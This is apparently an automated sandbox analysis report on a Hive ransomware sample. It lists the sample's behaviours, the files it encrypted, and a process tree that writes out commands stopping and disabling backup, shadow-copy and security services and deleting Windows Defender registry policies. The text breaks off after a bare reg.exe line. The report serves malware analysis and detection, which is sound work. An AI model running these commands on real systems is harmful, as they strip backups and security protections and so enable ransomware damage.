Analysis Overview
SHA256
dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413
Threat Level: Known bad
The file dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413 was found to be: Known bad.
Malicious Activity Summary
Deletes Windows Defender Definitions
Hive
Modifies Windows Defender Real-time Protection settings
Modifies security service
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
Modifies extensions of user files
Reads user/profile data of web browsers
Launches sc.exe
Drops file in Program Files directory
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Interacts with shadow copies
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 13:15
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 13:15
Reported
2022-01-13 13:20
Platform
win7-en-20211208
Max time kernel
19s
Max time network
16s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_yON8OUuNf6w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop.wmv | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\settings.css | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_BqLrzRE_XZU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\ja-JP\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_left.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_8DRUT4ZDHr80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\vistabg.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Omsk.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_UXgU9VSg9yA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Los_Angeles.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_lvpmm5TgBkg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.jpg | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\de-DE\wmpnetwk.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\flower_settings.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_NuGqTGRYZ9w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_HtTsxgTYzio0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\LightBlueRectangle.PNG | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_mM3D8vNbLhg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Maceio.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_JesLK8qC4Xc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\settings.html | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\mip.exe.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_nxmiqEHLXhg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\dsn.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_mwRNocGIRTU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_qpObUIThgjA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Fg4-7DZ1Y1k0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_5XU08yWcQns0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Belize.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_9UKLnagsxJc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\settings.js | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\15.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_cFB09WKWJc80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_2UoNOqxYoY40.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\rtstreamsink.ax | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_0LGxak5gF140.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\symbols\ea-sym.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_hPxadaAiJZQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_I0tyt2AufSQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Txa-NztkAvk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX__Afg6nichYQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_r7vtz-l-4Cw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_upIbecqDeQg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_BaFoJs1Tw0I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_fI_ra2osplU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_I_J1VdERECM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Hearts\en-US\Hearts.exe.mui.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_Mh5Hsyb1e7w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\SpiderSolitaire.exe.mui.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_T60PltQ5pXQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\css\weather.css | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_JOfUbhPDV0M0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_D6OseAH5CrQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera.ICcPImLrAyRZKqq3zknuloonZdXcJjxpxjY27KD8rNX_AmaHDGD_IP80.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe
"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
